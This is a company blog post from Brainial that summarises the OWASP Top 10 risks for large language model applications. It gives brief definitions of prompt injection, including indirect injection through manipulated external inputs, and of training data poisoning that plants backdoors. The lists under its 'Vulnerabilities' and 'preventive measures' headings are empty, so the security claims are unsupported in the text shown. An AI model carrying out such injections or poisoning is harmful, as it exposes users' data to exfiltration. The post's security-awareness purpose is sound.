With great power comes great responsibility, and the deployment of large language models presents unique security challenges that require a tailored set of OWASP guidelines
At Brainial we are ISO 27001 certified to ensure safety of the data our clients upload to their Brainial AI based Tender Assistant. We apply the OWASP standard as it It provides a comprehensive set of guidelines and best practices to identify and mitigate common security risks in web applications.
As technology continues to evolve, large language models (LLMs), such as GPT-X, ChatGPT and its successors, have become more prevalent. LLMs refer to machine learning models trained on huge amounts of data and deployed in apps like ChatGPT. GPT-4 from OpenAI, BERT and LaMDA 2 from Google and RoBERTa or LLaMA 2 from Meta are examples of LLMs. These models have the capability to generate human-like text, making them a valuable tool for tasks like natural language processing, content generation and digital assistants.
At Brainial we also leverage, train and finetune our own LLM models (for example our proprietary TenderGPT model) that we use in the tendering process, for example to summarise data, answer questions on tenders and to generate answers and draft text to enable AI assisted proposal writing.
LMMs are very powerful, however with great power comes great responsibility, and the deployment of large language models presents unique security challenges that require a tailored set of OWASP guidelines.
The OWASP Top 10 for Large Language Model Applications project aims to educate developers, designers, architects, managers, and organisations about the potential security risks when deploying and managing Large Language Models (LLMs). The project provides a list of the top 10 most critical vulnerabilities often seen in LLM applications, highlighting their potential impact, ease of exploitation, and prevalence in real-world applications.
Examples of vulnerabilities include prompt injections, data leakage, inadequate sandboxing, and unauthorised code execution, among others. The goal is to raise awareness of these vulnerabilities, suggest remediation strategies, and ultimately improve the security posture of LLM applications.
When training, fine-tuning and implementing Large Language Models into our application we check and validate against the common LLM OWASP vulnerabilities. This ensures a safe use of LLM technology and data safety for our customers LLM models and data.
At Brainial we apply the following checks and preventive measures.
Attackers can manipulate LLM’s through crafted inputs, causing it to execute the attacker's intentions. This can be done directly by adversarially prompting the system prompt or indirectly through manipulated external inputs, potentially leading to data exfiltration, social engineering, and other issues.
Vulnerabilities:
Our preventive measures:
Insecure Output Handling is a vulnerability that arises when a downstream component blindly accepts large language model (LLM)output without proper scrutiny. This can lead to XSS and CSRF in web browsers as well as SSRF, privilege escalation, or remote code execution on backend systems.
Vulnerabilities:
Our preventive measures:
Training Data Poisoning refers to manipulating the data or fine-tuning process to introduce vulnerabilities, backdoors or biases that could compromise the model’s security, effectiveness or ethical behaviour. This risks performance degradation, downstream software exploitation and reputational damage.
Vulnerabilities:
Our preventive measures:
Model Denial of Service occurs when an attacker interacts with a Large LanguageModel (LLM) in a way that consumes an exceptionally high amount of resources.This can result in a decline in the quality of service for them and other users, as well as potentially incurring high resource costs.
Vulnerabilities:
Our preventive measures:
Model chain vulnerabilities in LLMs can compromise training data, ML models, and deployment platforms, causing biased results, security breaches, or total system failures. Such vulnerabilities can stem from outdated software, susceptible pre-trained models, poisoned training data, and insecure plugin designs.
Vulnerabilities:
Our preventive measures:
LLM applications can inadvertently disclose sensitive information, proprietary algorithms, or confidential data, leading to unauthorised access, intellectual property theft, and privacy breaches. To mitigate these risks, LLM applications should employ data sanitisation, implement appropriate usage policies, and restrict the types of data returned by the LLM.
Vulnerabilities:
Our preventive measures:
Plugins can be prone to malicious requests leading to harmful consequences like data exfiltration, remote code execution, and privilege escalation due to insufficient access controls and improper input validation. Developers must follow robust security measures to prevent exploitation, like strict parameterised inputs and secure access control guidelines.
Vulnerabilities:
Our preventive measures:
Excessive Agency in LLM-based systems/agents is a vulnerability caused by over-functionality, excessive permissions, or too much autonomy. To prevent this, developers need to limit plugin or agent functionality, permissions, and autonomy to what's absolutely necessary, track user authorization, require human approval for all actions, and implement authorization in downstream systems.
Vulnerabilities:
Our preventive measures:
Over-reliance on output from LLMs can lead to serious consequences such as misinformation, legal issues, and security vulnerabilities.It occurs when an LLM is trusted to make critical decisions or generate content without adequate oversight or validation.
Vulnerabilities:
Preventive measures:
LLM model theft involves unauthorised access to and exfiltration of LLM models, risking economic loss, reputation damage, and unauthorised access to sensitive data.Robust security measures are essential to protect these models.
Vulnerabilities:
Our preventive measures:
The world of LLMs is still new and can be overwhelming, with a lot of research and experiments still going on and many areas still uncovered. However it is obvious that any company working with a LLM needs guidelines and checks in place and the OWASP standard provides a good starting point. Since NLP technology and LLMs are a core part of our AI powered Tender Assistant we are committed to provide our customers and users with a solution that is safe and can be trusted. That is why we implemented a LLM usage policy and the LLM OWASP guidelines as part of our ISO 27001 certification. Read more about our safety and security measures in our ISO 27001 certification
With Brainial's AI-powered technology, tender teams can easily find and qualify tenders, ensure they don't miss any critical information, get to the bottom of tender documents quickly and thoroughly, and find the information they need quickly and easily. By addressing these challenges, Brainial helps tender teams save time, reduce failure costs, and make more informed bid decisions. Check our AI Powered Tender Assist solution.